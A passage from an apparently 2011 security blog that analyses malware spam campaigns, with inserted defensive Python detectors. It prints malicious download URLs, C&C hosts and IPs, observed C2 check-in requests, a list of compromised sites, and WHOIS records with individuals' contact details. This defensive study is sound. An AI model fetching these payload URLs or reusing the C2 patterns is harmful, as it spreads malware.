Microsoft has released a workaround. The exploit is taking advantage of the fact that there is a problem in one of the DLLs called by TrueType in certain circumstances. If a system denies access to that DLL, T2EMBED.DLL, then the exploit would fail to work.

The workaround can be executed like this, but Microsoft cautions that applications that rely on EMBEDDED TrueType fonts could then fail to display properly:

(For older Windows versions, XP and Server 2003: deny the Everyone group access to the DLL)
Echo y| cacls "%windir%\system32\t2embed.dll" /E /P everyone:N

(For newer Windows versions, Vista and later: take ownership of the DLL, then deny the Everyone group access to it. The second command, also from the Microsoft advisory, is the one that actually blocks the DLL; Takeown alone only changes the owner.)
Takeown.exe /f "%windir%\system32\t2embed.dll"
Icacls.exe "%windir%\system32\t2embed.dll" /deny everyone:(F)

For more details on the workaround, please see Microsoft Security Advisory: Vulnerability in TrueType font parsing could allow elevation of privileges which offers a "Fix It For Me" button to apply the work around for you.

Duqu Compared to Stuxnet

The Symantec report has 22 or so pages of original Symantec content, and then has as the majority of its body the report by the CrySyS Lab, which has a section that compares the Duqu and Stuxnet code. In particular, the decryption function seems to be nearly identical.


ACH spam uses intermediary sites to deliver malware punch

by UAB's Director of Research in Computer Forensics on October 19, 2011

in SBN

If you have an email address in the United States, either you or your spam filter is certainly familiar with this spam by now:



The spam with the subjects "ACH Payment (random numbers) Canceled" intends to imitate the National Automated Clearing House Association. NACHA is the organization that banks use to handle the electronic transfer of funds between domestic banks for things such as "Direct Deposit" or electronic bill paying.

The spam's message "The ACH transaction recently initiated from your checking acount was canceled by the other financial institution" is intended to elicit a panic response to get the recipient to click on the link in the email.

The problem has been getting worse because of two "upgrades" by the spammers.

First - they are using "drive-by" infectors, in the form of the BlackHole Exploit Kit. In the past a spam message such as this would have relied on trying to get you to download an '.exe' file and trick you into running it on your computer. Now, simply visiting the website will often be enough to infect your machine.

The second improvement, which comes and goes in waves, is that the criminals have compromised many "intermediary" web hosts to use in their spam. If the spammer were sending you to "mybadsite.com" your security software would quickly learn that "mybadsite.com" is a potentially harmful destination and block you from visiting.

To make sure their spam is delivered, the spammers have stolen the credentials from many website owners and have used these credentials to add one tiny file to their existing legitimate website. So, as a randomly chosen example, the spam link that claims to point to "nacha.org" may actually point to a page at "iscsconferencerecording.com". That page belongs to the International Society of Communication Specialists, so it probably has a "positive" reputation among security companies, who may be loath to block the site.

What happens when we visit that page?

The only contents on the page "am2wdh.html" are calls to two JavaScript files on other websites. In this case:

www.xmjhx.com /czc /js.js
and
vscreative.com /images /js.js


The first time I loaded this, it caused a document location to be set to "www.nachaemployee.com"

A rerun of the same site pointed me instead to a BlackHole Exploit Kit page at:

milloworks.com /main.php? page=890639ab2b6c1ab8

Which caused me to fetch:

milloworks.com /w.php ?f=70&e=4

This caused me to download the file:

www.vncoach.com /editors /nachareport20111910.pdf.exe

Another attempt sent me to:

tgqswpqqh.org.in, from which we attempt to load the BlackHole Exploit page.

This drops a number of files on our computer, including Flash exploits, PDF exploits, and an EXE called "FIX_KB112755.exe" which gets downloaded from the IP address 213.123.52.133. FIX_KB111088.exe and FIX_KB113547.exe were also downloaded from there.

After the malware drops on the computer, we are forwarded through "dating-portal.net" where the affiliate engine sends us to an "Adult Friend Finder" sign-up website.
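The redirect chain just walked through (intermediary page, BlackHole landing page at main.php?page=<hex>, payload fetch at w.php?f=N&e=N, then a double-extension ".pdf.exe" download) has a recognisable shape in a web proxy log. The following is an added example, not code from the original post, that classifies each request by stage and reports clients whose traffic shows a landing page followed by a payload fetch; the log lines are constructed, reusing the URLs quoted above, and the URL patterns are assumed to hold for other BlackHole landings of the same kind.

```python
"""Flag the BlackHole Exploit Kit redirect chain from the post in proxy logs.

Added example, not code from the original post. Stage signatures follow the
URL shapes the post reports (main.php?page=<16 hex>, w.php?f=N&e=N, a
.pdf.exe download); SAMPLE_LOG is a constructed log using hosts named in the post.
"""
import re
from urllib.parse import parse_qs, urlparse

LANDING = re.compile(r"^/main\.php$")
PAYLOAD = re.compile(r"^/w\.php$")
HEX16 = re.compile(r"^[0-9a-f]{16}$")
# Document-looking name with a trailing .exe, as in nachareport20111910.pdf.exe
DOUBLE_EXT = re.compile(r"\.(pdf|doc|xls|jpg|txt)\.exe$", re.IGNORECASE)


def classify(url):
    """Return 'landing', 'payload' or 'dropper' for a URL in the chain, else None."""
    u = urlparse(url if "://" in url else "http://" + url)
    q = parse_qs(u.query)
    if LANDING.match(u.path) and "page" in q and HEX16.match(q["page"][0]):
        return "landing"
    if (PAYLOAD.match(u.path) and "f" in q and "e" in q
            and q["f"][0].isdigit() and q["e"][0].isdigit()):
        return "payload"
    if DOUBLE_EXT.search(u.path):
        return "dropper"
    return None


# Constructed log format: "time client METHOD url status"
LOG_LINE = re.compile(r"^(\S+) (\S+) (?:GET|POST) (\S+) (\d{3})$")


def parse_log(text):
    """Parse the constructed log lines into (time, client, url, status) tuples."""
    rows = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            rows.append((m.group(1), m.group(2), m.group(3), int(m.group(4))))
    return rows


def find_chains(rows):
    """Group flagged requests per client (in log order) and return the clients
    whose requests show a landing page followed later by a payload fetch."""
    per_client = {}
    for ts, client, url, _status in rows:
        stage = classify(url)
        if stage:
            per_client.setdefault(client, []).append((ts, stage, url))
    alerts = {}
    for client, hits in per_client.items():
        stages = [s for _, s, _ in hits]
        if ("landing" in stages and "payload" in stages
                and stages.index("landing") < stages.index("payload")):
            alerts[client] = hits
    return alerts


SAMPLE_LOG = """\
10:14:02 10.0.0.7 GET http://iscsconferencerecording.com/am2wdh.html 200
10:14:03 10.0.0.7 GET http://www.xmjhx.com/czc/js.js 200
10:14:04 10.0.0.7 GET http://milloworks.com/main.php?page=890639ab2b6c1ab8 200
10:14:06 10.0.0.7 GET http://milloworks.com/w.php?f=70&e=4 200
10:14:07 10.0.0.7 GET http://www.vncoach.com/editors/nachareport20111910.pdf.exe 200
10:15:00 10.0.0.9 GET http://example.com/main.php?page=about 200
10:15:01 10.0.0.9 GET http://example.com/report.pdf 200
"""

if __name__ == "__main__":
    for client, hits in find_chains(parse_log(SAMPLE_LOG)).items():
        print("possible BlackHole chain from", client)
        for ts, stage, url in hits:
            print("  ", ts, stage, url)
```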

The point of this story, however, is not really what malware gets dropped, but the use of so many hacked intermediary servers to do the dropping.

In the first twelve hours of October 19, 2011, we saw 184 different websites used in this type of attack with an ACH spam subject line. In order of occurrence, with the first observed URL each, here is what we've seen today:

HOSTNAME PATH
================================ ===================================
preseis.com /7x1tyg6.html
server.softhost.org /
silverfruit.com.ec /t2jr.html
newsletter.stable-jo.com /t43z.html
www.Shoubra-prep.com /4x8l.html
marcinjarzabek.cp5.win.pl /16ih2.html
professionalroofing.co.uk /ph4xn5.html
host272.hostmonster.com /~fdflockc/6xh9l1e.html
sethsauction.com /6gh1u7.html
www.corazondejesus.net /4cpjx.html
murciaopina.com /tq3e.html
www.digitalhomna.com /
latinholdings.com.mx /4ghy.html
108cms.com /3n7s.html
way2tutorial.com /g02lwbp.html
nimbuscertifications.com /4qt4.html
ultimateselena.org /0tpno.html
www.efficientorganizationnw.com /rk1pb.html
trinity-work-shop.test-rackspeed.de /
hosting31.serverhs.org /~ecommerc/zu9iah7.html
www.todotaringa.com /0pya.html
stremyfoot.com /q37hdi.html
www.ganarlaprimitiva.com /g5knqjr.html
manaiz.com /a2w7q.html
caspsurveys.org /zmu2.html
www.ironsidegroup.pk /kq6bz.html
temporary-toilets.com /mczkg.html
0342962.netsolhost.com /716txi.html
babilhotel.com /5bf0.html
customcakesnw.com /not8.html
tomralph.net /vsz8c.html
www.panelpeople.com /1060.html
goldencrownhotel.com /zf9w3uh.html
www.launas.fr /jjssgx4.html
dev.crm-warehouse.be /uclt4.html
alassite.com /2hyl0.html
02be375.netsolhost.com /6mu1v.html
evo2inc.com /o3wyn.html
campossaab.net /g1hr.html
inzanepix.com /19v4sx.html
specialrental.com /p5y6.html
iscsconferencerecording.com /am2wdh.html
www.murciaopina.com /rt5dmy.html
buynanoclean.com /3c6tp7.html
froda.com /5kbnak.html
globaliellc.com /1o36z.html
mslbx.com /~servatus/soexlyy.html
indexpoker.com /
diversco.com /6fxo.html
www.acclaimcabinets.com.au /7xoslgn.html
mvlmobile.in /d34c.html
weightlosspersonaltrainerconsulting.com /1decnf9.html
vandieautomatisering.nl /linhe.html
intestinoirritable.ws /e66uc.html
fmwwrestling.us /gsld0d.html
abeauty.com.au /
sokullupasahotel.com /fvn4upi.html
ants.net.au /yxe4ma.html
lkco.in /a8l876j.html
static-64-184-73-69.nocdirect.com /~afroland/eh8jvre.html
damarchesi.it /6m2rdlx.html
trinity-work-shop.de /5t5ub.html
mycountylink.com /f6atze.html
artigianatopasella.com /9ghy.html
ohtobeyoungagain.com /t4cj.html
syedaliahmad.com /3mlnfh.html
www.geelongeisteddfod.com.au /13pspj.html
www.tommysparger.com /ci87qyp.html
nt-ves.ac.th /
diipbmis.nl /l374dct.html
bakulpharma.com /
etno-plants.ro /
professionalroofing.co.uk /vmba.html
altiaproducts.com /29f4.html
dezoetezaak.nl /anxl5.html
ozurfa.com.tr /ras5.html
lexxstore.de /7nsenq.html
meirmodiin.org /~meirm/kk22.html
siflindia.com /27swn2.html
grapediscounts.com /fjlj9k.html
fastincomebiz.com /hsd6g7b.html
thebeadrotisserie.com /vel42.html
46.23.64.241 /~jamias/lc50sf.html
fastincomesystem.biz /u8g4tn.html
surebg.co.za /xltlgs.html
110.4.42.93 /bx94l.html
www.resourceelementlimited.com /
graph2profit.com /utxfc.html
shriganpatiproduction.net /r05qv4h.html
micrene.com /ivowl1r.html
pdscientific.com /tl1s.html
www.wanithai.com /u7pv30b.html
ads-protection.com /fs3lax.html
sl3-vgt.vgthosting.com /~worknetw/fj2bvn.html
fb.servatusdev.com /~servdev/56iy2.html
hedy-lamarr.org /n2tgsb.html
niritech.com /pxkf.html
212.68.54.148 /~radyoruz/qsdsw9m.html
www.pushtiieshakti.com /783i.html
empiresallies-secrets.com /k0bayr.html
tarjetaspilos.com /9tvd.html
voongo.com /asfti1/index.html
searchtroop.net /04sh.html
altagallura.it /bd5j.html
gran-mar.com.ar /4p6sbu7.html
fullart.com.pe /3c55egr.html
sanianishtar.info /7o2dd.html
umtelecom.com /h10kr.html
reformasyreparaciones.com /76kdp.html
206.217.196.47 /~dumpsche/kes773.html
acumenauditors.com.au /vfa9.html
www.rippt.com /t8859u.html
trunghieu.com /hsx1n3r.html
delallosa.com /mtgy99y.html
lainformacion.us /snkk1.html
refritermo.com /j9ps4y.html
www.grahajodoh.com /bqe6zk.html
etakip.com /yg4jl9.html
carifind.com /t718xh.html
jpvarleyllc.com /kna4wx.html
www.shatteredhope.gr /lnsp.html
autoblog.fastincomesystem.biz /~cheers/gyjde.html
reformhaus-mehnert.de /2vn9yr5.html
indianbookshop.co.in /5b9fgs.html
host272.hostmonster.com /~fdflockc/6xh9l1e.html
enbramex.com /mpvsgi2.html
onlinesurat.com /mb2d.html
surrealtopia.com /hmsuu.html
el-salto-fishing.com /agg0noo.html
simplefact.mx /xln290.html
bofco.in /htrc.html
iznillahcng.com /y5le.html
static-64-184-73-69.nocdirect.com /~afroland/eh8jvre.html
vizonix.com /c1ptwqs/index.html
visionciudadconsultores.com /dwqopc/index.html
winsbyinc.com /0sm9j5/index.html
www.tradehalls.com /8eeh2.html
4income-solutions.com /93e3x.html
locanda-stazzo-bona.com /
jade.nseasy.com /~manishar/7xl9bd.html
GUHDNS.COM /md8g.html
livedata.it /ssao.html
www.manojengg.com /scv2.html
sexshop.com.tr /3igtv8.html
perfumeylenceria.com /joiwku.html
server10.namecheaphosting.com /
freunde-klinik-ottobeuren.de /oryh1.html
floristeriasdecoaromascostarica.com /kh31.html
portalinternational.us /5ecf2z.html
molinas.eu /nz4ot.html
clubfirst.org /2ba0jra.html
thepentad.com /eg3eje/index.html
www.dsmodular.com /qt21ta.html
hotelmarinepalace.com /0493.html
teresita.com.mx /hcrji4t.html
198.63.48.81 /z116c.html
punjnud.com /3sllgki.html
inkostudio.com /y0ao0c.html
tuncakyavas.com /jfifrpb.html
hkf.huber-babenhausen.de /xyy4dg3.html
watson.timeweb.ru /~kostos/7euyd25.html
vscreative.com /x882.html
lemilano.fr /
labeltula.it /e51rsq.html
www.acclaimcabinets.com.au /
shelterpropertydealers.com /97qf.html
dotmile.com /cvpa4jj.html
www.clubbayard.com /w6kzi.html
myauto.co.nz /odmz0c.html
whydodogs.org /jdab40.html
bigrace2012.com /3ri1vt.html
www.launas-hebergement.com /fj9p1.html
www.neoplastic.gr /0qedzw.html
ittefaqpipe.com /2inp.html
efficientorganizationnw.com /ix84c.html
indosyslife.com /cdwwto.html
newmonicaarts.org /
avicarusa.com /uyxasjr.html
atlantidesardegna.it /61fyvx.html
baratrucks.com /n6j5m.html
heromw.com /602ka.html
web3.biz /4jdsydk.html
eqsync.com /bx5wfm.html
weblinksubmissions.com /1bgypq/index.html
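Added example, not code from the original post: a small triage pass over proxy-log URLs that tags the three shapes this post walks through, the throwaway forwarder pages on hacked hosts (short junk filename, sometimes under a cPanel-style /~user/ directory), the Blackhole main.php landing and w.php payload requests, and a document-extension-plus-.exe drop, and then lists the distinct hosts serving forwarder pages, which is the abuse-report list the post is really about. The regular expressions and the "random-looking name" heuristic are my assumptions, and the sample URLs are constructed from shapes seen above plus benign ones for contrast.

```python
import re
from urllib.parse import urlsplit

# Constructed input: URL shapes taken from the post (forwarder pages, the
# Blackhole landing and payload URLs, the .pdf.exe drop) plus benign ones.
SAMPLE_URLS = [
    "http://preseis.com/7x1tyg6.html",
    "http://host272.hostmonster.com/~fdflockc/6xh9l1e.html",
    "http://voongo.com/asfti1/index.html",
    "http://milloworks.com/main.php?page=890639ab2b6c1ab8",
    "http://milloworks.com/w.php?f=70&e=4",
    "http://www.vncoach.com/editors/nachareport20111910.pdf.exe",
    "http://example.org/index.html",
    "http://example.org/about-us.html",
    "http://example.org/images/logo.png",
]

# Forwarder pages: a 4-7 char junk name, either "<name>.html" or
# "<name>/index.html", optionally under a cPanel-style "/~user/" directory.
FORWARDER_RE = re.compile(r"^(?:/~[\w-]+)?/([a-z0-9]{4,7})(?:\.html|/index\.html)$")
# Payload disguised with a document extension in front of .exe
DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|doc|xls|txt|jpg)\.exe$", re.I)


def looks_random(token):
    """Heuristic (assumption, not from the post): junk names mix letters and
    digits or have no vowel at all; real page names like 'index' do neither."""
    has_digit = any(c.isdigit() for c in token)
    has_vowel = any(c in "aeiou" for c in token)
    return has_digit or not has_vowel


def classify(url):
    """Return the list of indicator tags that match one URL."""
    p = urlsplit(url)
    tags = []
    m = FORWARDER_RE.match(p.path)
    if m and looks_random(m.group(1)):
        tags.append("forwarder-page")
    # Blackhole landing page: main.php?page=<16 hex chars>
    if p.path.endswith("/main.php") and re.fullmatch(r"page=[0-9a-f]{16}", p.query):
        tags.append("blackhole-landing")
    # Blackhole exploit/payload fetch: w.php?f=<n>&e=<n>
    if p.path.endswith("/w.php") and re.fullmatch(r"f=\d+&e=\d+", p.query):
        tags.append("blackhole-payload")
    if DOUBLE_EXT_RE.search(p.path):
        tags.append("double-extension-exe")
    return tags


def triage(urls):
    """Classify every URL and list the distinct hosts serving forwarder pages."""
    hits = {u: classify(u) for u in urls}
    forwarder_hosts = sorted({urlsplit(u).hostname for u, t in hits.items()
                              if "forwarder-page" in t})
    return hits, forwarder_hosts


if __name__ == "__main__":
    hits, hosts = triage(SAMPLE_URLS)
    for u, t in hits.items():
        print(f"{u:65} {','.join(t) or '-'}")
    print("forwarder hosts:", hosts)
```

The forwarder heuristic deliberately misses names that are all letters with a vowel (such as "linhe" in the list above); the signal that matters in practice is not any one filename but the number of distinct hosts producing such hits in a short window.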

{ Comments on this entry are closed }

New York City "Uniform Traffic Ticket" tops spammed malware

by UAB's Director of Research in Computer Forensics on August 17, 2011

in SBN

Email attachments that contain malicious code are still being used to infect computers and steal the data found on those computers. While it is easy to find people who discount this threat, believing no one would be foolish enough to open one of these email attachments, the criminals are working hard to make their approaches more convincing.

Today we've seen more than 11,000 copies of their newest attempt come in to the UAB Spam Data Mine. The email received looks like this:



The email contains several falsified header indicators, starting with the most basic one: it claims to come from "@nyc.gov". In addition, a "Received:" header has been added to make it appear to have originated from a legitimate New York City IP address:

Received: from nyc.gov ([167.153.240.51]) by xx.xx.xx.xx; Wed, 03 Aug 2011 12:20:46 +0530

The City of New York is the registrant for every IP address beginning with "167.153.*.*" - in fact 167.153.240.51 is the IP address of the website "nyc.gov" where Mayor Bloomberg's homepage can be found.

The other false information is the date. Both the date in the Received: line and the date in the "Date:" header have been falsified to make it seem this email has been sitting in your inbox for several days by the time you see it.

Just from the falsified header, we would predict that this email is going to be in the same family of malware as the "IRS Notification" and "UPS Notification" emails seen earlier this week, which also contained falsified Received: tags.
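As an added example (not the author's code), here is the check a mail gateway or analyst script can run on those headers. The principle is that only the Received: line your own MTA wrote is trustworthy; every line below it, and the Date: header, came from the sender. The code flags a Date: far from your MTA's own timestamp, a sender-supplied hop that claims a watched domain, and a real peer IP outside that domain's known address space. The message is constructed (the top Received: line and mx.example.net are assumed; the bottom one is the forged line quoted above), and the 167.153.0.0/16 range comes from the post.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime

# Constructed message: the bottom Received: line is the forged one quoted in the
# post; the top one is what the receiving MTA (assumed: mx.example.net) added.
RAW_MAIL = """\
Received: from 203.0.113.7 (unknown [203.0.113.7]) by mx.example.net with SMTP; Wed, 17 Aug 2011 09:02:11 -0500
Received: from nyc.gov ([167.153.240.51]) by xx.xx.xx.xx; Wed, 03 Aug 2011 12:20:46 +0530
From: "NYC Department of Finance" <tickets@nyc.gov>
Date: Wed, 03 Aug 2011 12:20:46 +0530
Subject: Uniform traffic ticket

Please see the attached ticket.
"""

# The post states the City of New York holds all of 167.153.*.*; any other
# domain you want to watch goes here with its known netblocks (assumption).
OWNER_RANGES = {"nyc.gov": [ipaddress.ip_network("167.153.0.0/16")]}

FROM_RE = re.compile(r"^from\s+(\S+)", re.I)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value):
    """Split one Received: value into claimed host, bracketed IP and timestamp."""
    value = " ".join(value.split())                  # unfold continuation lines
    head, sep, stamp = value.rpartition(";")
    if not sep:                                      # no timestamp at all
        head, stamp = value, ""
    m_host, m_ip = FROM_RE.match(head), IP_RE.search(head)
    return {
        "claimed_host": m_host.group(1).lower() if m_host else None,
        "ip": ipaddress.ip_address(m_ip.group(1)) if m_ip else None,
        "when": parsedate_to_datetime(stamp.strip()) if stamp.strip() else None,
    }


def check_headers(raw, trusted_hops=1, max_skew_days=2):
    """Only the top `trusted_hops` Received: lines were written by our own
    infrastructure; everything below them, and Date:, came from the sender."""
    msg = message_from_string(raw)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    ours, theirs = hops[:trusted_hops], hops[trusted_hops:]
    findings = []

    # 1. Sender-supplied Date: far from the time our MTA actually received it
    if ours and ours[0]["when"] and msg["Date"]:
        skew = ours[0]["when"] - parsedate_to_datetime(msg["Date"])
        if abs(skew.days) > max_skew_days:
            findings.append(f"date-skew:{skew.days}d")

    # 2. A sender-written hop that claims to be a watched domain
    for h in theirs:
        if h["claimed_host"] in OWNER_RANGES:
            findings.append(f"sender-supplied-hop-claims:{h['claimed_host']}")

    # 3. The peer our MTA really talked to is outside the From: domain's space
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    nets = OWNER_RANGES.get(from_domain)
    peer = ours[0]["ip"] if ours else None
    if nets and peer and not any(peer in n for n in nets):
        findings.append(f"peer-outside-owner-range:{peer}")
    return findings


if __name__ == "__main__":
    for finding in check_headers(RAW_MAIL):
        print(finding)
```

Set trusted_hops to the number of Received: lines your own relays add (an edge MX plus an internal hop is two); counting too few makes the sender's forged line look trusted, which is exactly the mistake the spammer is hoping for.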

The zip file contains an executable file disguised as a PDF file:



When the malware is launched, it connects to "sfkdhjnsfjg.ru" on 195.189.226.117.

From there it fetches "/ftp/g.php" and "pusk3.exe" -- exactly the same as the IRS Notification spam and the UPS Notification spam.

VirusTotal Report



Another group of spam messages this morning pretends to be a notice that you have received money via Western Union.

The attachment is of course a virus:

VirusTotal Report.

Money Transfer Information
MONEY TRANSFER INFORMATION
Money Transfer Information 00375
Money Transfer Notice
MONEY TRANSFER NOTICE
MONEY TRANSFER NOTICE 06457
Western Union: Money Transfer For You
WESTERN UNION: MONEY TRANSFER FOR YOU
Western Union: Remittance Advice
WESTERN UNION: REMITTANCE ADVICE
Western Union: Transfer Of Money
WESTERN UNION: TRANSFER OF MONEY
Western Union: You Have Money Transfer
WESTERN UNION: YOU HAVE MONEY TRANSFER
Western Union: You have received a money transfer
WESTERN UNION: YOU HAVE RECEIVED A MONEY TRANSFER




Another heavily spammed malware attachment today arrives in emails with these subjects:

Re: End of July Statement Required
Re: FW: End of July Stat.
Re: FW: End of July Statement
Re: FW: End of July Statement required
Re: FW: End of July Statement Required
Re: FW: End of July Statement REquired
Re: FW: End of July Statement REquired!
Re: FW: End of July Stat. required
Re: FW: End of July Stat. Required

The email body says simply:

Hallo,
As requested i give you open Invoices issued to you as per 5th Aug. 2011
Regards
DEENA BUCKLEY


Here's the VirusTotal report for this one.


{ Comments on this entry are closed }

Inter-company Invoice spam leads to Malware

by UAB's Director of Research in Computer Forensics on August 10, 2011

in SBN

This morning we are seeing a new spam campaign in the UAB Spam Data Mine. Volumes are still low, but the count is rising steadily, and the detection so far is horrible. When I started writing this post we had seen 710 copies. It's now up to 1389 copies and counting!

count | mbox
-------+---------------------
1 | 2011-08-10 05:45:00
6 | 2011-08-10 06:00:00
3 | 2011-08-10 06:15:00
85 | 2011-08-10 06:30:00
1 | 2011-08-10 06:45:00
3 | 2011-08-10 07:00:00
1 | 2011-08-10 07:15:00
301 | 2011-08-10 07:30:00
252 | 2011-08-10 07:45:00
260 | 2011-08-10 08:00:00
247 | 2011-08-10 08:15:00
229 | 2011-08-10 08:30:00
(12 rows)


The spam pretends to be an invoice from a random company. So far this morning we've seen spam claiming to be an invoice from:

Aleris International Corp.
AMR Corporation Corp.
Anic Corp.
Arch Coal Corp.
ATFT Corp
Beazer Homes USA Corp.
Boyd Gaming Corp.
Brookdale Senior Living Corp.
Hyland Software Corp.
KPMG Corp.
Kraft Foods Corp.
Miltek Corp.
Novellus Systems Corp.
OSN Corp.
PDC Corp.
Safeco Corporation Corp.
WLC Corp.

The subject can be any of:

Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company invoice from (company)
Re: Fw: Intercompany invoice from (company)
Re: Fw: Corp. invoice from (company)

A couple example emails follow:



Hi
Attached the inter-company inv. for the period January 2010 til December 2010.

Thanks a lot for support setting up this process.

CHERYL Flowers
Kraft Foods Corp.



Hi

Attached the inter-company inv. for the period January 2010 til December 2010.
Thanks a lot

Asher GIFFORD
Anic Corp.



Good day


Attached the intercompany invoice for the period January 2010 til December 2010.

Thanks a lot for supporting this process
MAYOLA LEARY
Aleris International Corp.




The attachment is named "Intinvoice" or "Invoice", followed by an underscore, a date, another underscore, an "invoice number", and ".zip", such as:

Intinvoice_08.6.2011_2222341965.zip
or
Intinvoice_08.4.2011_Q167829.zip
or
Invoice_08.6.2011_T40099.zip


We've seen 1300+ copies so far in the UAB Spam Data Mine, and I have 15 in my personal email.

So far, all have had the same attachment MD5, which yields a 6 of 43 detection rate on this VirusTotal Report.

So far everyone is just saying it is "Suspicious" or "Generic" ... which is our invitation to infect ourselves and figure out what it does!

When we launched the malware, we made a connection to "armaturan.ru" on 94.199.48.152.

We also talked to "ss-partners.ru" on 77.120.114.100
and to "ledinit.ru" on 78.111.51.121

The connection to armaturan.ru did:

GET /forum/dl/ots.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}

which seems to register our machine uniquely with the C&C, and to give "seller" #4 credit for my infection.

From ss-partners.ru we fetched a file:

GET /dump/light.exe

which dropped a file of roughly 70 KB onto our local machine.

Then we went back to armaturan.ru and sent another get:

GET /forum/dl/getruns.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}&ahash=5895b2509324d6a17b2b6ea09859a485

Any bets on whether that ahash is the MD5 of the file I just downloaded?

Looks like I just reported back to the C&C that I successfully downloaded and installed malware with that MD5.

At this point I checked my registry and found that I had a new Run command for next time I restart. I'm supposed to run:

C:\Documents and Settings\Administrator\Application Data\3B1F8DC4\3B1F8DC4.EXE

Odd, I don't recall having a file named that?

Actually, we confirmed that this is the file that was downloaded as "light.exe" above. VirusTotal shows only 4 of 43 detections for this file as well. See VirusTotal Report.

Unfortunately, it disproves my MD5 theory. This is NOT the "ahash" value. This file's MD5 is f58d5cbb564069eca8806d4e48d7a714.

Launching the second file caused the machine to open an SSL tunnel to 78.111.51.121 and then sit idle.

You may recognize that as the IP address for "ledinit.ru" earlier, but it didn't make a connection by name. It went straight for the IP address. If that IP sounds familiar, it's probably because there have been many other malware campaigns tied to the network "Azerbaijan Baku Sol Ltd", but I'm sure that's just because it's a very large network.

78.111.51.100 is currently hosting three live Zeus C&C servers. Surely a coincidence.

fileuplarc.com
hunterdriveez.com
asdfasdgqghgsw.cx.cc

I'll email the owner and get those taken down right away! (smirk)

-----------

person: Vugar Kouliyev
address: 44, J.Jabbarli str., Baku, Azerbaijan
mnt-by: MNT-SOL
e-mail: vugar@kouliyev.com
phone: +994124971234
nic-hdl: VK1161-RIPE
source: RIPE # Filtered

route: 78.111.48.0/20
descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

route: 78.111.51.0/24
descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

----------------

Armaturan.ru on 94.199.48.152 also has a sordid history.

That IP address, in Hungary, has been associated with at least two active SpyEye domains: hdkajhslalskjd.ru and hhasdalkjjfasd.ru

I suppose we'll have to ask Mr. Zsolt nicely if he would remove those domains.

person: Zemancsik Zsolt
address: Victor Hugo u. 18-22.
address: 1132 Budapest
address: Hungary
phone: +36 203609059
e-mail: darwick@cyberground.hu
nic-hdl: DARW-RIPE
mnt-by: DARW-MNT
source: RIPE # Filtered

route: 94.199.48.0/21
descr: Originated from 23VNet Network
origin: AS30836
mnt-by: NET23-MNT
source: RIPE # Filtered

========
ss-partners.ru is on servers from Bellhost.ru, a customer of Volia DC

person: Volia DC Admin contact
address: Ukraine, Kiev, Kikvidze st. 1/2
phone: +38 044 2852716
abuse-mailbox: abuse@dc.volia.com
nic-hdl: VDCA-RIPE
mnt-by: VOLIA-DC-MNT
source: RIPE # Filtered

route: 77.120.96.0/19
descr: Volia more specific route
origin: AS25229
mnt-by: VOLIA-MNT
mnt-lower: VOLIA-MNT
source: RIPE # Filtered


{ Comments on this entry are closed }

Fake IRS emails continue to spread Gov-related Zeus

by UAB's Director of Research in Computer Forensics on August 5, 2011

in SBN

We've already seen nearly 500 copies of the new Government-related Zeus spam campaign so far this morning in the UAB Spam Data Mine. As has been typical in this campaign, which we first started tracking on July 13th, detection of each morning's new malware version has been fairly horrible. We last updated on this malware on July 29th in our story Government-related Zeus Spam Continues.

Today's version advertises the domain "tax-irs-report.com" and asks users to download the file 0000770950077US.pdf.exe from that site.

190 different computers have sent us this campaign's spam so far today: 118 of them from the USA, 40 from India.

When we asked the UAB Spam Data Mine what other virus links we had been sent by this same group of 190 computers on other days, we got this list:

receiving_date | machine | path
----------------+------------------------------+-------------------------------
2011-07-13 | usbanking-security.com | /tax_report.pdf.exe
2011-07-15 | federalsecusrity.com | /pending-taxes.pdf.exe
2011-07-19 | irs-report-link.com | /tax-report.pdf.exe
2011-07-19 | irs-taxes-report.com | /tax-report.pdf.exe
2011-07-19 | taxreport-irs.com | /tax-report.pdf.exe
2011-07-20 | alerts-federalresrve.com | /rejected_wire.pdf.exe
2011-07-20 | nacha-alert.com | /rejected_transaction.pdf.exe
2011-07-20 | nacha-alert.org | /rejected_transfer.pdf.exe
2011-07-20 | reports-federalreserve.com | /rejected_wire.pdf.exe
2011-07-21 | national-security-agency.com | /blocked_list.exe
2011-07-21 | national-security-agency.com | /token_security_update.exe
2011-07-21 | nsa-security.net | /blocked-list.exe
2011-07-21 | nsa-security.net | /token_security_update.exe
2011-07-22 | irs-downloads.com | /00000700955160US.exe
2011-07-22 | irs-files.com | /00000700955170US.exe
2011-07-26 | irs-alert.com | /00000700955770US.exe
2011-07-27 | nacha-transactions.org | /304694305894903.pdf.exe
2011-07-27 | taxes-refund.com | /00000700975770US.exe
2011-07-27 | www.nacha-rejected.com | /304694305894903.pdf.exe
2011-07-28 | fdic-updates.com | /system_update_07_28.exe
2011-07-29 | federalreserve-alert.com | /transaction_report.pdf.exe
2011-07-29 | taxes-security.com | /00000700955060US.pdf.exe
2011-08-03 | irs-report.com | /00000770950077US.exe
2011-08-05 | tax-irs-report.com | /0000770950077US.pdf.exe
(24 rows)

So, at least some of today's spamming computers have been with this campaign since the beginning (July 13th).

When today's malware is executed it adds a value under "HKEY_USERS\S-1-5(my user)-500\Software\Microsoft\Windows\CurrentVersion\Run" so that it relaunches at my next logon from the copy it made of itself at "C:\Documents and Settings\Administrator\Application Data\Afena\iror.exe"
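Both this post and the Inter-company Invoice post above found the persistence in the same place: a Run value pointing into the user's Application Data directory, once as a self-named hex directory (3B1F8DC4\3B1F8DC4.EXE) and once as short random names (Afena\iror.exe). The following is an added example, not the author's tooling, that scores Run values on exactly those two traits plus the location. The regular expressions are my heuristics; the sample entries are constructed from the paths in the posts plus two benign ones. The live-registry reader uses the standard winreg module and simply returns nothing on non-Windows hosts.

```python
import re
import sys

RUN_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

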